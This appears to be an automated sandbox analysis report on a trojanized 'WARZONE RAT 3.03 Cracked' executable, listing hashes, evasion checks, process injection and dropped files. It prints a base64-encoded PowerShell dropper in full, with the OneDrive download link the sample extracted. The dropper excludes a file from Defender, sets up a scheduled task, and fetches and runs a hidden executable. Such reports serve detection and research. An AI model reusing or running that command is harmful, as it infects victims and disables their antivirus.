7c4f34556d1064cbe1889b7d6567b6f8baccaa9d33c18b18f7a2dfb0458484d1

Analysis

max time kernel
150s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
26-03-2023 23:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

WARZONE RAT 3.03/WARZONE-RAT 3.03 Cracked.exe
Size

14.1MB
MD5

6d150d36b56cdc5bbd815f89735c7f87
SHA1

ad0dd5834bdaf8552e0c2a16fca8894786f7f299
SHA256

8a165d8c914a2c64273ddb5ea961e8d7f4e42f3a803af96886ebfd0ff576be1d
SHA512

3ad90ab0dc0af13d6aff72699e4398aeb404340b212ae9e82627603c028e4b6c24f0aec82eaa867cfc2c2129441352fce79b3978d5a6fcac20622f3e20e283f2
SSDEEP

196608:M7ua82jskVEUbKBsY6+jLD07YMT7DKSilI/xaU71ItNSyF6apyMWv1aQWipiZh7b:MKxPUtMD07YeKAZaUQh6apGttQb2m

Score

10^/10

evasion themida trojan

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://onedrive.live.com/download?cid=C7F050ABA6D0F6B7&resid=C7F050ABA6D0F6B7%21105&authkey=AIPYamsd38clFVs

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

WARZONE-RAT 3.03 Cracked.exe

description pid process target process

PID 2380 created 3228 2380 WARZONE-RAT 3.03 Cracked.exe Explorer.EXE

description	pid	process	target process
PID 2380 created 3228	2380	WARZONE-RAT 3.03 Cracked.exe	Explorer.EXE

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

WARZONE-RAT 3.03 Cracked.exeWARZONE RAT 3.03 Cracked.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	WARZONE-RAT 3.03 Cracked.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	WARZONE RAT 3.03 Cracked.exe

Blocklisted process makes network request 4 IoCs

Processes:

powershell.exe

flow pid process

17 1608 powershell.exe
19 1608 powershell.exe
23 1608 powershell.exe
25 1608 powershell.exe

flow	pid	process
17	1608	powershell.exe
19	1608	powershell.exe
23	1608	powershell.exe
25	1608	powershell.exe

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WARZONE RAT 3.03 Cracked.exeWARZONE-RAT 3.03 Cracked.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	WARZONE RAT 3.03 Cracked.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	WARZONE-RAT 3.03 Cracked.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	WARZONE-RAT 3.03 Cracked.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	WARZONE RAT 3.03 Cracked.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WARZONE-RAT 3.03 Cracked.exeWARZONE-RAT 3.03 Cracked.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation	WARZONE-RAT 3.03 Cracked.exe
Key value queried	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation	WARZONE-RAT 3.03 Cracked.exe

Executes dropped EXE 1 IoCs

Processes:

WARZONE RAT 3.03 Cracked.exe

pid process

4036 WARZONE RAT 3.03 Cracked.exe

pid	process
4036	WARZONE RAT 3.03 Cracked.exe

Themida packer 14 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral14/memory/2380-135-0x0000000000840000-0x0000000001D82000-memory.dmp	themida
behavioral14/memory/2380-139-0x0000000000840000-0x0000000001D82000-memory.dmp	themida
C:\Users\Admin\AppData\Local\Temp\WARZONE RAT 3.03\WARZONE RAT 3.03 Cracked.exe	themida
C:\Users\Admin\AppData\Local\Temp\WARZONE RAT 3.03\WARZONE RAT 3.03 Cracked.exe	themida
behavioral14/memory/2380-218-0x0000000000840000-0x0000000001D82000-memory.dmp	themida
C:\Users\Admin\AppData\Local\Temp\WARZONE RAT 3.03\WARZONE RAT 3.03 Cracked.exe	themida
behavioral14/memory/4036-221-0x0000000000400000-0x0000000001411000-memory.dmp	themida
behavioral14/memory/4036-236-0x0000000000400000-0x0000000001411000-memory.dmp	themida
behavioral14/memory/4036-237-0x0000000000400000-0x0000000001411000-memory.dmp	themida
behavioral14/memory/4036-239-0x0000000000400000-0x0000000001411000-memory.dmp	themida
behavioral14/memory/4036-240-0x0000000000400000-0x0000000001411000-memory.dmp	themida
behavioral14/memory/4036-255-0x0000000000400000-0x0000000001411000-memory.dmp	themida
behavioral14/memory/2876-266-0x0000000000840000-0x0000000001D82000-memory.dmp	themida
behavioral14/memory/4036-279-0x0000000000400000-0x0000000001411000-memory.dmp	themida

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

WARZONE-RAT 3.03 Cracked.exeWARZONE RAT 3.03 Cracked.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	WARZONE-RAT 3.03 Cracked.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	WARZONE RAT 3.03 Cracked.exe

Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

24 icanhazip.com
25 icanhazip.com

flow	ioc
24	icanhazip.com
25	icanhazip.com

Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs

Processes:

WARZONE-RAT 3.03 Cracked.exeWARZONE-RAT 3.03 Cracked.exeWARZONE RAT 3.03 Cracked.exe

pid	process
2380	WARZONE-RAT 3.03 Cracked.exe
2876	WARZONE-RAT 3.03 Cracked.exe
2876	WARZONE-RAT 3.03 Cracked.exe
4036	WARZONE RAT 3.03 Cracked.exe
2876	WARZONE-RAT 3.03 Cracked.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

WARZONE-RAT 3.03 Cracked.exe

description pid process target process

PID 2380 set thread context of 2876 2380 WARZONE-RAT 3.03 Cracked.exe WARZONE-RAT 3.03 Cracked.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	pid	process	target process
PID 2380 set thread context of 2876	2380	WARZONE-RAT 3.03 Cracked.exe	WARZONE-RAT 3.03 Cracked.exe

Modifies registry class 1 IoCs

Processes:

WARZONE-RAT 3.03 Cracked.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	WARZONE-RAT 3.03 Cracked.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

WARZONE-RAT 3.03 Cracked.exepowershell.exe

pid process

2876 WARZONE-RAT 3.03 Cracked.exe
2876 WARZONE-RAT 3.03 Cracked.exe
1608 powershell.exe
1608 powershell.exe

pid	process
2876	WARZONE-RAT 3.03 Cracked.exe
2876	WARZONE-RAT 3.03 Cracked.exe
1608	powershell.exe
1608	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exe

description	pid	process
Token: SeDebugPrivilege	1608	powershell.exe
Token: SeIncreaseQuotaPrivilege	1608	powershell.exe
Token: SeSecurityPrivilege	1608	powershell.exe
Token: SeTakeOwnershipPrivilege	1608	powershell.exe
Token: SeLoadDriverPrivilege	1608	powershell.exe
Token: SeSystemProfilePrivilege	1608	powershell.exe
Token: SeSystemtimePrivilege	1608	powershell.exe
Token: SeProfSingleProcessPrivilege	1608	powershell.exe
Token: SeIncBasePriorityPrivilege	1608	powershell.exe
Token: SeCreatePagefilePrivilege	1608	powershell.exe
Token: SeBackupPrivilege	1608	powershell.exe
Token: SeRestorePrivilege	1608	powershell.exe
Token: SeShutdownPrivilege	1608	powershell.exe
Token: SeDebugPrivilege	1608	powershell.exe
Token: SeSystemEnvironmentPrivilege	1608	powershell.exe
Token: SeRemoteShutdownPrivilege	1608	powershell.exe
Token: SeUndockPrivilege	1608	powershell.exe
Token: SeManageVolumePrivilege	1608	powershell.exe
Token: 33	1608	powershell.exe
Token: 34	1608	powershell.exe
Token: 35	1608	powershell.exe
Token: 36	1608	powershell.exe
Token: SeIncreaseQuotaPrivilege	1608	powershell.exe
Token: SeSecurityPrivilege	1608	powershell.exe
Token: SeTakeOwnershipPrivilege	1608	powershell.exe
Token: SeLoadDriverPrivilege	1608	powershell.exe
Token: SeSystemProfilePrivilege	1608	powershell.exe
Token: SeSystemtimePrivilege	1608	powershell.exe
Token: SeProfSingleProcessPrivilege	1608	powershell.exe
Token: SeIncBasePriorityPrivilege	1608	powershell.exe
Token: SeCreatePagefilePrivilege	1608	powershell.exe
Token: SeBackupPrivilege	1608	powershell.exe
Token: SeRestorePrivilege	1608	powershell.exe
Token: SeShutdownPrivilege	1608	powershell.exe
Token: SeDebugPrivilege	1608	powershell.exe
Token: SeSystemEnvironmentPrivilege	1608	powershell.exe
Token: SeRemoteShutdownPrivilege	1608	powershell.exe
Token: SeUndockPrivilege	1608	powershell.exe
Token: SeManageVolumePrivilege	1608	powershell.exe
Token: 33	1608	powershell.exe
Token: 34	1608	powershell.exe
Token: 35	1608	powershell.exe
Token: 36	1608	powershell.exe
Token: SeIncreaseQuotaPrivilege	1608	powershell.exe
Token: SeSecurityPrivilege	1608	powershell.exe
Token: SeTakeOwnershipPrivilege	1608	powershell.exe
Token: SeLoadDriverPrivilege	1608	powershell.exe
Token: SeSystemProfilePrivilege	1608	powershell.exe
Token: SeSystemtimePrivilege	1608	powershell.exe
Token: SeProfSingleProcessPrivilege	1608	powershell.exe
Token: SeIncBasePriorityPrivilege	1608	powershell.exe
Token: SeCreatePagefilePrivilege	1608	powershell.exe
Token: SeBackupPrivilege	1608	powershell.exe
Token: SeRestorePrivilege	1608	powershell.exe
Token: SeShutdownPrivilege	1608	powershell.exe
Token: SeDebugPrivilege	1608	powershell.exe
Token: SeSystemEnvironmentPrivilege	1608	powershell.exe
Token: SeRemoteShutdownPrivilege	1608	powershell.exe
Token: SeUndockPrivilege	1608	powershell.exe
Token: SeManageVolumePrivilege	1608	powershell.exe
Token: 33	1608	powershell.exe
Token: 34	1608	powershell.exe
Token: 35	1608	powershell.exe
Token: 36	1608	powershell.exe

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

WARZONE-RAT 3.03 Cracked.exeWARZONE-RAT 3.03 Cracked.execmd.exe

description	pid	process	target process
PID 2380 wrote to memory of 2876	2380	WARZONE-RAT 3.03 Cracked.exe	WARZONE-RAT 3.03 Cracked.exe
PID 2380 wrote to memory of 2876	2380	WARZONE-RAT 3.03 Cracked.exe	WARZONE-RAT 3.03 Cracked.exe
PID 2380 wrote to memory of 2876	2380	WARZONE-RAT 3.03 Cracked.exe	WARZONE-RAT 3.03 Cracked.exe
PID 2380 wrote to memory of 2876	2380	WARZONE-RAT 3.03 Cracked.exe	WARZONE-RAT 3.03 Cracked.exe
PID 2380 wrote to memory of 2876	2380	WARZONE-RAT 3.03 Cracked.exe	WARZONE-RAT 3.03 Cracked.exe
PID 2380 wrote to memory of 2876	2380	WARZONE-RAT 3.03 Cracked.exe	WARZONE-RAT 3.03 Cracked.exe
PID 2380 wrote to memory of 2876	2380	WARZONE-RAT 3.03 Cracked.exe	WARZONE-RAT 3.03 Cracked.exe
PID 2380 wrote to memory of 2876	2380	WARZONE-RAT 3.03 Cracked.exe	WARZONE-RAT 3.03 Cracked.exe
PID 2380 wrote to memory of 2876	2380	WARZONE-RAT 3.03 Cracked.exe	WARZONE-RAT 3.03 Cracked.exe
PID 2380 wrote to memory of 2876	2380	WARZONE-RAT 3.03 Cracked.exe	WARZONE-RAT 3.03 Cracked.exe
PID 2380 wrote to memory of 2876	2380	WARZONE-RAT 3.03 Cracked.exe	WARZONE-RAT 3.03 Cracked.exe
PID 2380 wrote to memory of 2876	2380	WARZONE-RAT 3.03 Cracked.exe	WARZONE-RAT 3.03 Cracked.exe
PID 2380 wrote to memory of 2876	2380	WARZONE-RAT 3.03 Cracked.exe	WARZONE-RAT 3.03 Cracked.exe
PID 2380 wrote to memory of 4036	2380	WARZONE-RAT 3.03 Cracked.exe	WARZONE RAT 3.03 Cracked.exe
PID 2380 wrote to memory of 4036	2380	WARZONE-RAT 3.03 Cracked.exe	WARZONE RAT 3.03 Cracked.exe
PID 2380 wrote to memory of 4036	2380	WARZONE-RAT 3.03 Cracked.exe	WARZONE RAT 3.03 Cracked.exe
PID 2876 wrote to memory of 4816	2876	WARZONE-RAT 3.03 Cracked.exe	cmd.exe
PID 2876 wrote to memory of 4816	2876	WARZONE-RAT 3.03 Cracked.exe	cmd.exe
PID 4816 wrote to memory of 1608	4816	cmd.exe	powershell.exe
PID 4816 wrote to memory of 1608	4816	cmd.exe	powershell.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3228

C:\Users\Admin\AppData\Local\Temp\WARZONE RAT 3.03\WARZONE-RAT 3.03 Cracked.exe
"C:\Users\Admin\AppData\Local\Temp\WARZONE RAT 3.03\WARZONE-RAT 3.03 Cracked.exe"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2380

C:\Users\Admin\AppData\Local\Temp\WARZONE RAT 3.03\WARZONE RAT 3.03 Cracked.exe
"C:\Users\Admin\AppData\Local\Temp\WARZONE RAT 3.03\WARZONE RAT 3.03 Cracked.exe"
3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4036

C:\Users\Admin\AppData\Local\Temp\WARZONE RAT 3.03\WARZONE-RAT 3.03 Cracked.exe
"C:\Users\Admin\AppData\Local\Temp\WARZONE RAT 3.03\WARZONE-RAT 3.03 Cracked.exe"
2⤵
- Checks computer location settings
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2876

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\EDEF.tmp\EDF0.bat "C:\Users\Admin\AppData\Local\Temp\WARZONE RAT 3.03\WARZONE-RAT 3.03 Cracked.exe""
3⤵
- Suspicious use of WriteProcessMemory
PID:4816

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -e JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAnAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAJwANAAoAJABhAGMAdABpAG8AbgAgAD0AIABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAkAGUAbgB2ADoAcAByAG8AZwByAGEAbQBkAGEAdABhAFwAbQBpAGMAcgBvAHMAbwBmAHQAXABNAGEAaQBuAHQAZQBuAGEAbgBjAGUALgBlAHgAZQANAAoAJAB0AHIAaQBnAGcAZQByACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBBAHQATABvAGcAbwBuACAADQAKACQAdABhAHMAawBwAGEAdABoACAAPQAgACIATQBhAGkAbgB0AGUAbgBhAG4AYwBlACAAUwBlAHQAdABpAG4AZwBzACAAQwBvAG4AdAByAG8AbAAgAFAAYQBuAGUAbAAiAA0ACgBSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACQAYQBjAHQAaQBvAG4AIAAtAFQAcgBpAGcAZwBlAHIAIAAkAHQAcgBpAGcAZwBlAHIAIAAtAFQAYQBzAGsATgBhAG0AZQAgACIATQBhAGkAbgB0AGUAbgBhAG4AYwBlACAAUwBlAHQAdABpAG4AZwBzACAAQwBvAG4AdAByAG8AbAAgAFAAYQBuAGUAbAAiACAALQBUAGEAcwBrAFAAYQB0AGgAIAAkAHQAYQBzAGsAcABhAHQAaAAgAC0ARgBvAHIAYwBlAA0ACgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJABlAG4AdgA6AHAAcgBvAGcAcgBhAG0AZABhAHQAYQBcAG0AaQBjAHIAbwBzAG8AZgB0AFwATQBhAGkAbgB0AGUAbgBhAG4AYwBlAC4AZQB4AGUAIAAtAEYAbwByAGMAZQANAAoAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAANAANAAoAJABzAG8AdQByAGMAZQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBvAG4AZQBkAHIAaQB2AGUALgBsAGkAdgBlAC4AYwBvAG0ALwBkAG8AdwBuAGwAbwBhAGQAPwBjAGkAZAA9AEMANwBGADAANQAwAEEAQgBBADYARAAwAEYANgBCADcAJgByAGUAcwBpAGQAPQBDADcARgAwADUAMABBAEIAQQA2AEQAMABGADYAQgA3ACUAMgAxADEAMAA1ACYAYQB1AHQAaABrAGUAeQA9AEEASQBQAFkAYQBtAHMAZAAzADgAYwBsAEYAVgBzACIADQAKACQAZABlAHMAdAAgAD0AIAAiACQAZQBuAHYAOgBwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXABtAGkAYwByAG8AcwBvAGYAdABcAE0AYQBpAG4AdABlAG4AYQBuAGMAZQAuAGUAeABlACIAIAANAAoASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAcwBvAHUAcgBjAGUAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAGQAZQBzAHQADQAKACQARgBJAEwARQA9AEcAZQB0AC0ASQB0AGUAbQAgACQAZQBuAHYAOgBwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXABtAGkAYwByAG8AcwBvAGYAdABcAE0AYQBpAG4AdABlAG4AYQBuAGMAZQAuAGUAeABlACAALQBGAG8AcgBjAGUADQAKACQARgBJAEwARQAuAGEAdAB0AHIAaQBiAHUAdABlAHMAPQAnAFIAZQBhAGQATwBuAGwAeQAnACwAJwBIAGkAZABkAGUAbgAnACwAJwBTAHkAcwB0AGUAbQAnAA0ACgAkAEEAYwBsACAAPQAgAEcAZQB0AC0AQQBjAGwAIAAiACQAZQBuAHYAOgBwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXABtAGkAYwByAG8AcwBvAGYAdABcAE0AYQBpAG4AdABlAG4AYQBuAGMAZQAuAGUAeABlACIADQAKACQAQQByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAgAHMAeQBzAHQAZQBtAC4AcwBlAGMAdQByAGkAdAB5AC4AYQBjAGMAZQBzAHMAYwBvAG4AdAByAG8AbAAuAGYAaQBsAGUAcwB5AHMAdABlAG0AYQBjAGMAZQBzAHMAcgB1AGwAZQAoACIARQB2AGUAcgB5AG8AbgBlACIALAAiAFcAcgBpAHQAZQAiACwAIgBEAGUAbgB5ACIAKQANAAoAJABBAGMAbAAuAFMAZQB0AEEAYwBjAGUAcwBzAFIAdQBsAGUAKAAkAEEAcgApAA0ACgBTAGUAdAAtAEEAYwBsACAAIgAkAGUAbgB2ADoAcAByAG8AZwByAGEAbQBkAGEAdABhAFwAbQBpAGMAcgBvAHMAbwBmAHQAXABNAGEAaQBuAHQAZQBuAGEAbgBjAGUALgBlAHgAZQAiACAAJABBAGMAbAANAAoAcwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXABtAGkAYwByAG8AcwBvAGYAdABcAE0AYQBpAG4AdABlAG4AYQBuAGMAZQAuAGUAeABlAA0ACgB3AGcAZQB0ACAAaAB0AHQAcABzADoALwAvAHkAaQBwAC4AcwB1AC8AMgBBAGQAMgBSADcADQAKAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AEUAeABpAHQAKAAxACkAIAA=
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1608

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Maintenance.exe
Filesize
24KB

MD5
0a28ae0a21b1aa18ef6c7090935ad343

SHA1
6f422a1404e95f74a0cb4bff84412f5b01cce064

SHA256
efe0c3cc8bc603395894941213db76608f7cfc36cfb3cc85b0188e52520d7881

SHA512
48fe18fca59b513100f3a18b09e8c749af8e26b059b4f6d0ab2a9df8fbf968e09b51ff4d11977323b49c09b874abb615e7e823cf8dd1a2a6d17147eeae99bae8

Download Submit
C:\Users\Admin\AppData\Local\Temp\EDEF.tmp\EDF0.bat
Filesize
3KB

MD5
92f586ef328c08e4f1fcadfaa9c6fda3

SHA1
d7dfe6cba0da0b2899f36de421beb9e37bab90c1

SHA256
ca48023e395b42650416e76da9cd6a05aeb7922c63636127f9c80e07221cdfd0

SHA512
8d16bf916b07e47103967dce1f80d0420e337273fab4035879568d4a71d5685b3cbe507b4a1fbf01a1a3595457b53d9750c2862174729396f0a61cd3ee9b588c

Download Submit
C:\Users\Admin\AppData\Local\Temp\WARZONE RAT 3.03\WARZONE RAT 3.03 Cracked.exe
Filesize
7.5MB

MD5
c4daff84358c5820887b5b29a075eb16

SHA1
aca441058e3de9cf7a4412d2b728cf9833deeefa

SHA256
9dcc00c96b015e91cbbe41ef815818c1fde4af9b78130cc266dabd8a21b18c3c

SHA512
04ea6489d9e6e1d9de5d95d985a3ce7903ac48af520d9dfb291214fda7b1bc522fbc28f1d59cfd11157824cacfd1a7e178eb3b447085b44d3f7de5d2e30cb714

Download Submit
C:\Users\Admin\AppData\Local\Temp\WARZONE RAT 3.03\WARZONE RAT 3.03 Cracked.exe
Filesize
7.5MB

MD5
c4daff84358c5820887b5b29a075eb16

SHA1
aca441058e3de9cf7a4412d2b728cf9833deeefa

SHA256
9dcc00c96b015e91cbbe41ef815818c1fde4af9b78130cc266dabd8a21b18c3c

SHA512
04ea6489d9e6e1d9de5d95d985a3ce7903ac48af520d9dfb291214fda7b1bc522fbc28f1d59cfd11157824cacfd1a7e178eb3b447085b44d3f7de5d2e30cb714

Download Submit
C:\Users\Admin\AppData\Local\Temp\WARZONE RAT 3.03\WARZONE RAT 3.03 Cracked.exe
Filesize
7.5MB

MD5
c4daff84358c5820887b5b29a075eb16

SHA1
aca441058e3de9cf7a4412d2b728cf9833deeefa

SHA256
9dcc00c96b015e91cbbe41ef815818c1fde4af9b78130cc266dabd8a21b18c3c

SHA512
04ea6489d9e6e1d9de5d95d985a3ce7903ac48af520d9dfb291214fda7b1bc522fbc28f1d59cfd11157824cacfd1a7e178eb3b447085b44d3f7de5d2e30cb714

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4mgotqgd.hvk.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1608-263-0x0000019919800000-0x0000019919810000-memory.dmp

Filesize
64KB

Download
memory/1608-225-0x000001997EF60000-0x000001997EF82000-memory.dmp

Filesize
136KB

Download
memory/1608-223-0x0000019919800000-0x0000019919810000-memory.dmp

Filesize
64KB

Download
memory/1608-262-0x0000019919800000-0x0000019919810000-memory.dmp

Filesize
64KB

Download
memory/1608-261-0x0000019919800000-0x0000019919810000-memory.dmp

Filesize
64KB

Download
memory/1608-254-0x0000019980010000-0x00000199807B6000-memory.dmp

Filesize
7.6MB

Download
memory/1608-224-0x0000019919800000-0x0000019919810000-memory.dmp

Filesize
64KB

Download
memory/1608-238-0x0000019919800000-0x0000019919810000-memory.dmp

Filesize
64KB

Download
memory/1608-235-0x0000019919800000-0x0000019919810000-memory.dmp

Filesize
64KB

Download
memory/2380-137-0x00007FFE00000000-0x00007FFE00002000-memory.dmp

Filesize
8KB

Download
memory/2380-140-0x00000000046D0000-0x00000000046E0000-memory.dmp

Filesize
64KB

Download
memory/2380-138-0x00007FFE00030000-0x00007FFE00031000-memory.dmp

Filesize
4KB

Download
memory/2380-214-0x0000000004810000-0x0000000004843000-memory.dmp

Filesize
204KB

Download
memory/2380-212-0x00007FFE00010000-0x00007FFE00011000-memory.dmp

Filesize
4KB

Download
memory/2380-136-0x0000000000840000-0x0000000001D82000-memory.dmp

Filesize
21.3MB

Download
memory/2380-216-0x0000000029B80000-0x0000000029BBD000-memory.dmp

Filesize
244KB

Download
memory/2380-218-0x0000000000840000-0x0000000001D82000-memory.dmp

Filesize
21.3MB

Download
memory/2380-135-0x0000000000840000-0x0000000001D82000-memory.dmp

Filesize
21.3MB

Download
memory/2380-139-0x0000000000840000-0x0000000001D82000-memory.dmp

Filesize
21.3MB

Download
memory/2876-197-0x0000000140000000-0x0000000140CE0000-memory.dmp

Filesize
12.9MB

Download
memory/2876-189-0x00007FF4878E0000-0x00007FF487CB1000-memory.dmp

Filesize
3.8MB

Download
memory/2876-217-0x0000000140000000-0x0000000140CE0000-memory.dmp

Filesize
12.9MB

Download
memory/2876-215-0x0000000140000000-0x0000000140CE0000-memory.dmp

Filesize
12.9MB

Download
memory/2876-209-0x0000000140000000-0x0000000140CE0000-memory.dmp

Filesize
12.9MB

Download
memory/2876-207-0x0000000140000000-0x0000000140CE0000-memory.dmp

Filesize
12.9MB

Download
memory/2876-199-0x0000000140000000-0x0000000140CE0000-memory.dmp

Filesize
12.9MB

Download
memory/2876-266-0x0000000000840000-0x0000000001D82000-memory.dmp

Filesize
21.3MB

Download
memory/2876-265-0x0000000140000000-0x0000000140CE0000-memory.dmp

Filesize
12.9MB

Download
memory/2876-198-0x0000000140000000-0x0000000140CE0000-memory.dmp

Filesize
12.9MB

Download
memory/2876-143-0x0000000140000000-0x0000000140CE0000-memory.dmp

Filesize
12.9MB

Download
memory/2876-146-0x0000000000840000-0x0000000001D82000-memory.dmp

Filesize
21.3MB

Download
memory/2876-141-0x0000000140000000-0x0000000140CE0000-memory.dmp

Filesize
12.9MB

Download
memory/2876-253-0x0000000000840000-0x0000000001D82000-memory.dmp

Filesize
21.3MB

Download
memory/2876-196-0x0000000140000000-0x0000000140CE0000-memory.dmp

Filesize
12.9MB

Download
memory/2876-258-0x0000000140000000-0x0000000140CE0000-memory.dmp

Filesize
12.9MB

Download
memory/2876-257-0x00007FF4878E0000-0x00007FF487CB1000-memory.dmp

Filesize
3.8MB

Download
memory/4036-273-0x0000000005D70000-0x0000000005D80000-memory.dmp

Filesize
64KB

Download
memory/4036-237-0x0000000000400000-0x0000000001411000-memory.dmp

Filesize
16.1MB

Download
memory/4036-255-0x0000000000400000-0x0000000001411000-memory.dmp

Filesize
16.1MB

Download
memory/4036-277-0x0000000007BB0000-0x0000000007BBA000-memory.dmp

Filesize
40KB

Download
memory/4036-276-0x0000000007AB0000-0x0000000007B16000-memory.dmp

Filesize
408KB

Download
memory/4036-236-0x0000000000400000-0x0000000001411000-memory.dmp

Filesize
16.1MB

Download
memory/4036-271-0x0000000007310000-0x00000000078B4000-memory.dmp

Filesize
5.6MB

Download
memory/4036-272-0x0000000005D70000-0x0000000005D80000-memory.dmp

Filesize
64KB

Download
memory/4036-274-0x0000000005D70000-0x0000000005D80000-memory.dmp

Filesize
64KB

Download
memory/4036-275-0x0000000007A00000-0x0000000007A92000-memory.dmp

Filesize
584KB

Download
memory/4036-240-0x0000000000400000-0x0000000001411000-memory.dmp

Filesize
16.1MB

Download
memory/4036-239-0x0000000000400000-0x0000000001411000-memory.dmp

Filesize
16.1MB

Download
memory/4036-221-0x0000000000400000-0x0000000001411000-memory.dmp

Filesize
16.1MB

Download
memory/4036-278-0x0000000005D70000-0x0000000005D80000-memory.dmp

Filesize
64KB

Download
memory/4036-279-0x0000000000400000-0x0000000001411000-memory.dmp

Filesize
16.1MB

Download
memory/4036-280-0x0000000005D70000-0x0000000005D80000-memory.dmp

Filesize
64KB

Download
memory/4036-281-0x0000000005D70000-0x0000000005D80000-memory.dmp

Filesize
64KB

Download
